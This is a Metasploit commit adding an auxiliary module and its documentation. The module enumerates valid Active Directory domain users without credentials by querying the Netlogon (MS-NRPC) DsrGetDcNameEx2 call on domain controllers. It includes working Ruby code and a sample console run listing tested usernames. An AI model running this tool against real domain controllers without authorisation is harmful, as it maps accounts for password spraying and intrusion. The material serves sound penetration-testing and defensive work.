Land rapid7#19205, Add MS-NRPC users enumeration module

Author: smcintyre-r7

documentation/modules/auxiliary/scanner/dcerpc/nrpc_enumusers.md

@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+A new method for gathering domain users. The method leverages auth-level = 1 (No authentication) against the
+MS-NRPC (Netlogon) interface on domain controllers. All that's required is the domain controller's IP address,
+and the entire process can be completed without providing any credentials.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/nrpc_enumusers`
+2. Do: `set RHOSTS <targer IP addresses>`
+3. Do: `set USER_FILE <path to your users list>`
+4. Do: `run`
+
+
+## Target
+
+To use nrpc_enumusers, make sure you are able to connect to the Domain Controller.
+It has been tested with Windows servers 2012, 2016, 2019 and 2022
+
+## Options
+
+### USER_FILE
+
+**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+
+**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
+
+**Example:** `set USER_FILE /path/to/usernames.txt`
+
+2- `RHOSTS` (required)
+
+**Description:** The target IP address or range of IP addresses of the Domain Controllers.
+
+**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
+
+**Example:** `set RHOSTS 192.168.1.100`
+
+3- `RPORT` (optional)
+
+**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
+
+**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
+
+**Example:** `set RPORT 49664`
+
+## Scenarios
+
+The following demonstrates basic usage, using a custom wordlist,
+targeting a single Domain Controller to identify valid domain user accounts.
+
+Create a new `./users.txt` file, then run the module:
+
+```
+msf6 auxiliary(gather/nrpc_enumusers) > set RHOSTS 192.168.177.177
+RHOSTS => 192.168.177.177
+msf6 auxiliary(gather/nrpc_enumusers) > set USER_FILE users.txt 
+USER_FILE => users.txt
+msf6 auxiliary(gather/nrpc_enumusers) > run
+
+[*] 192.168.177.177: - Connecting to the endpoint mapper service...
+[*] 192.168.177.177: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.177.177[49664]...
+[-] 192.168.177.177: - Tiffany.Molina does not exist
+[-] 192.168.177.177: - SMITH does not exist
+[-] 192.168.177.177: - JOHNSON does not exist
+[-] 192.168.177.177: - WILLIAMS does not exist
+[-] 192.168.177.177: - Administratorsvc_ldap does not exist
+[-] 192.168.177.177: - svc_ldap does not exist
+[-] 192.168.177.177: - ksimpson does not exist
+[+] 192.168.177.177: - Administrator exists
+[-] 192.168.177.177: - James does not exist
+[-] 192.168.177.177: - nikk37 does not exist
+[-] 192.168.177.177: - svc-printer does not exist
+[-] 192.168.177.177: - SABatchJobs does not exist
+[-] 192.168.177.177: - e.black does not exist
+[-] 192.168.177.177: - Kaorz does not exist
+[*] 192.168.177.177: - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/nrpc_enumusers) >
+```

modules/auxiliary/scanner/dcerpc/nrpc_enumusers.rb

@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::DCERPC
+  Netlogon = RubySMB::Dcerpc::Netlogon
+  @dport = nil
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'MS-NRPC Domain Users Enumeration',
+        'Description' => %q{
+          This module will enumerate valid Domain Users via no authentication against MS-NRPC interface.
+          It calls DsrGetDcNameEx2 to check if the domain user account exists or not. It has been tested with
+          Windows servers 2012, 2016, 2019 and 2022.
+        },
+        'Author' => [
+          'Haidar Kabibo <https://x.com/haider_kabibo>'
+        ],
+        'References' => [
+          ['URL', 'https://github.com/klsecservices/Publications/blob/master/A_journey_into_forgotten_Null_Session_and_MS-RPC_interfaces.pdf']
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [false, 'The netlogon RPC port']),
+        OptPath.new('USER_FILE', [true, 'Path to the file containing the list of usernames to enumerate']),
+        OptBool.new('DB_ALL_USERS', [ false, 'Add all enumerated usernames to the database', false ])
+      ]
+    )
+  end
+
+  def bind_to_netlogon_service
+    @dport = datastore['RPORT']
+    if @dport.nil? || @dport == 0
+      @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')
+      fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport
+    end
+    handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])
+    print_status("Binding to #{handle}...")
+    dcerpc_bind(handle)
+  end
+
+  def dsr_get_dc_name_ex2(username)
+    request = Netlogon.const_get('DsrGetDcNameEx2Request').new(
+      computer_name: nil,
+      account_name: username,
+      allowable_account_control_bits: 0x200,
+      domain_name: nil,
+      domain_guid: nil,
+      site_name: nil,
+      flags: 0x00000000
+    )
+    begin
+      raw_response = dcerpc.call(request.opnum, request.to_binary_s)
+    rescue Rex::Proto::DCERPC::Exceptions::Fault
+      fail_with(Failure::UnexpectedReply, "The Netlogon RPC request failed for username: #{username}")
+    end
+    Netlogon.const_get('DsrGetDcNameEx2Response').read(raw_response)
+  end
+
+  def report_username(domain, username)
+    service_data = {
+      address: datastore['RHOST'],
+      port: @dport,
+      service_name: 'netlogon',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def run_host(_ip)
+    usernames = load_usernames(datastore['USER_FILE'])
+    bind_to_netlogon_service
+
+    usernames.each do |username|
+      enumerate_user(username)
+    end
+  end
+
+  private
+
+  def load_usernames(file_path)
+    unless ::File.exist?(file_path)
+      fail_with(Failure::BadConfig, 'The specified USER_FILE does not exist')
+    end
+
+    usernames = []
+    ::File.foreach(file_path) do |line|
+      usernames << line.strip
+    end
+    usernames
+  end
+
+  def enumerate_user(username)
+    response = dsr_get_dc_name_ex2(username)
+    if response.error_status == 0
+      print_good("#{username} exists -> DC: #{response.domain_controller_info.domain_controller_name.encode('UTF-8')}")
+      if datastore['DB_ALL_USERS']
+        report_username(response.domain_controller_info.domain_name.encode('UTF-8'), username)
+      end
+    else
+      print_error("#{username} does not exist")
+    end
+  end
+end